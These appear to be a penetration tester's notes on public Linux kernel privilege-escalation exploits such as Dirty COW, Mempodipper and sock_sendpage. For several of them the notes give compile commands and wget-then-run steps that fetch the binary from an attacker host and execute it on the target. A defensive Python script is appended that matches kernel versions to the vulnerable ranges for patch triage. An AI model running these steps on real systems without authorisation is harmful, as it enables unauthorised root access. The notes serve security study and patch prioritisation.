Kernel Exploits

Usage notes for common kernel exploits.

**Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)**

https://www.exploit-db.com/exploits/9542

If the target machine is 32-bit, cross-compile the exploit on our own machine with `-m32`, then fetch and run it on the target:

```bash
gcc -m32 -Wl,--hash-style=both -o 9542 9542.c
```

```bash
wget http://192.168.1.1/9542 && chmod +x 9542 && ./9542
```

**Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation**

https://www.exploit-db.com/exploits/9545

If this doesn't work, change the module name passed to `socket()` on line 349 of 9545.c; a list of candidate modules is in comment 24 of https://bugzilla.redhat.com/show_bug.cgi?id=516949#c24.

```c
if ((out_fd = socket({MODULENAME}, SOCK_DGRAM, 0)) == -1)
```

```bash
gcc -m32 -Wl,--hash-style=both 9545.c -o 9545
wget http://192.168.1.1/9545 && chmod +x 9545 && ./9545
```

From the header comment of linux-sendpage.c (the same exploit as 9545):

```c
 * Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
 * are vulnerable.
 * For i386 and ppc, compile with the following command:
 * gcc -Wall -o linux-sendpage linux-sendpage.c
 *
 * And for x86_64 and ppc64:
 * gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
```

**Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2)**

exploits/linux/local/35161.c

https://www.exploit-db.com/raw/35161

```bash
mkdir /tmp/poc
cd /tmp/poc
wget http://192.168.1.1/35161.c
gcc 35161.c -o poc
./poc
```

**Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation**

https://www.exploit-db.com/exploits/44298

Compile on our machine:

```bash
cp /usr/share/exploitdb/exploits/linux/local/44298.c .
gcc 44298.c -o exploit.php
```

Then fetch it on the target, rename it and run it:

```bash
wget http://192.168.1.1:8080/exploit.php
mv exploit.php exploit
chmod +x exploit
./exploit
```

**Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation**

https://www.exploit-db.com/exploits/45010

```bash
gcc cve-2017-16995.c -o cve-2017-16995
./cve-2017-16995
```

**Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)**

https://www.exploit-db.com/exploits/40839

https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c

```bash
gcc -pthread dirty.c -o dirty -lcrypt
./dirty
```
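As an added patch-audit check (not part of the original page and not exploit-db code), the script below parses `uname -r` style release strings and reports which of the kernel version ranges quoted in the exploit titles above a given kernel falls into, so affected hosts can be prioritised for patching. The bounds are copied from the titles; the two titles that only state an upper bound (`< 4.13.9`, `< 4.4.0-116`) get an assumed lower bound of 0, and the sample release strings are constructed. Distribution kernels backport fixes without changing the version number, so a match means "verify the patch level", not "confirmed vulnerable".

```python
"""Triage a kernel release string against the version ranges quoted above.

Added example: parses `uname -r` output (e.g. '4.4.0-116-generic') into a
numeric tuple and checks it against each range. Bounds come from the exploit
titles on this page; nothing here verifies a vulnerability.
"""
import re
from typing import List, Tuple

Version = Tuple[int, ...]

# (label, lowest affected, first fixed); the upper bound is exclusive.
# Titles with an inclusive upper bound ("to 2.6.30.4") use the next patch
# level as the exclusive bound. Titles that only say "< X" give no lower
# bound, so 0 is assumed and the label says so.
VULNERABLE_RANGES: List[Tuple[str, str, str]] = [
    ("ip_append_data() / EDB-9542 (2.6 < 2.6.19)", "2.6.0", "2.6.19"),
    ("sock_sendpage() / EDB-9545 (2.4.4 to 2.4.37.4)", "2.4.4", "2.4.37.5"),
    ("sock_sendpage() / EDB-9545 (2.6.0 to 2.6.30.4)", "2.6.0", "2.6.30.5"),
    ("Dirty COW / EDB-40839 (2.6.22 < 3.9)", "2.6.22", "3.9"),
    ("Mempodipper / EDB-35161 (2.6.39 < 3.2.2)", "2.6.39", "3.2.2"),
    ("CVE-2017-16995 / EDB-45010 (< 4.13.9, lower bound assumed 0)", "0", "4.13.9"),
    ("EDB-44298 (< 4.4.0-116, Ubuntu 16.04.4 kernels; lower bound assumed 0)", "0", "4.4.0-116"),
]

_NUM = re.compile(r"\d+")


def parse_kernel_version(release: str) -> Version:
    """Turn '4.4.0-116-generic' or '2.6.32-754.el6.x86_64' into a tuple.

    Keeps the leading dotted release and the first number after the dash
    (the distro build number); suffixes such as 'el6' or 'generic' are
    ignored. Tuple comparison then orders versions numerically, and a
    longer tuple with an equal prefix sorts after the shorter one, so
    '2.6.19-5' is correctly treated as not below '2.6.19'.
    """
    head = release.strip().split("-", 1)
    parts = [int(x) for x in _NUM.findall(head[0])]
    if len(head) > 1:
        m = _NUM.match(head[1])
        if m:
            parts.append(int(m.group()))
    if not parts:
        raise ValueError(f"not a kernel version: {release!r}")
    return tuple(parts)


def affected_ranges(release: str) -> List[str]:
    """Labels of every listed range the given kernel release falls inside."""
    version = parse_kernel_version(release)
    hits = []
    for label, low, high in VULNERABLE_RANGES:
        if parse_kernel_version(low) <= version < parse_kernel_version(high):
            hits.append(label)
    return hits


if __name__ == "__main__":
    import platform

    # Constructed sample release strings (not real hosts) plus the running kernel.
    samples = [
        "2.6.18-194.el5",
        "3.2.0-23-generic",
        "4.4.0-112-generic",
        "5.15.0-91-generic",
        platform.release(),
    ]
    for rel in samples:
        hits = affected_ranges(rel)
        print(f"{rel}: {', '.join(hits) if hits else 'no listed range matches'}")
```

Run it on an inventory export of `uname -r` values to get a first cut of which hosts need their patch level checked against the vendor's errata for each entry.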
